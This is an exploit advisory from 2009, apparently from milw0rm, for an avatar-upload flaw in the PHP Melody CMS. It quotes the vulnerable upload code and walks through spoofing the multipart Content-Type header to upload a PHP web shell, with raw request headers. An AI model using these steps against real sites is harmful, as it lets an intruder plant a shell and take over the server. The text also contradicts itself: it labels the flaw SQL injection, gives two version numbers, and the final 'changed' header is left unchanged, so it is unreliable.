--------------------------------------------------- PHP Melody 1.5.3 remote injection upload file --------------------------------------------------- ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Group : LatinHackTeam [+] Vulnerability : SQL injection ################################################### ---------info Cms---------------- name : PHP Melody version 1.5.2 email : support@phpsugar.com dowloand : http://www.phpsugar.com web : http://www.phpsugar.com price : $39 USD --------------------------------- File: Upload_avatar.php 37. if(preg_match("/.jpg/i", "$filein")) 38. { 39. $format = 'image/jpeg'; 40. } 41. if (preg_match("/.gif/i", "$filein")) 42. { 43. $format = 'image/gif'; 44. } 45. if(preg_match("/.png/i", "$filein")) 46. { 47. $format = 'image/png'; 48. } 49. switch($format) 50. { 51. case 'image/jpeg': 52. $image = imagecreatefromjpeg($filein); 53. break; 54. case 'image/gif'; 55. $image = imagecreatefromgif($filein); 56. break; 57. case 'image/png': 58. $image = imagecreatefrompng($filein); 59. break; 60. } ------------ 136. $url = $_FILES['imagefile']['name']; // Set $url To Equal The Filename For Later Use 137. if ($_FILES['imagefile']['type'] == "image/png" || $_FILES['imagefile']['type'] == "image/gif" || $_FILES['imagefile']['type'] == "image/jpg" || $_FILES['imagefile']['type'] == "image/jpeg" || $_FILES['imagefile']['type'] == "image/pjpeg") { 138. $file_ext = strrchr($_FILES['imagefile']['name'], '.'); // Get The File Extention In The Format Of , For Instance, .jpg, .gif or .php -------------------------------- explanation: according to the code it does is see if the http, it is 'image/jpeg';'image/gif';'image/png'; If not upload how to exploit: you must first register then upload the avatar you ever so upload_avatar.php there will have to change the header header with a proper imagen.gif looks like -----------------------------191691572411478\r\n Content-Disposition: form-data; name="imagefile"; filename="imagen.gif"\r\n Content-Type: image/gif\r\n\r\n the header when you upload a shell.php looks like -----------------------------191691572411478\r\n Content-Disposition: form-data; name="imagefile"; filename="shell.php"\r\n Content-Type: application/octet-stream\r\n\r\n then just change it and let q and so can upload *. php -----------------------------191691572411478\r\n Content-Disposition: form-data; name="imagefile"; filename="shell.php"\r\n Content-Type: application/octet-stream\r\n\r\n Special greetings to my brother d4ng3r ;) +++++++++++++++++++++++++++++++++ [!] Produced in South America --------------------------------- # milw0rm.com [2009-07-23]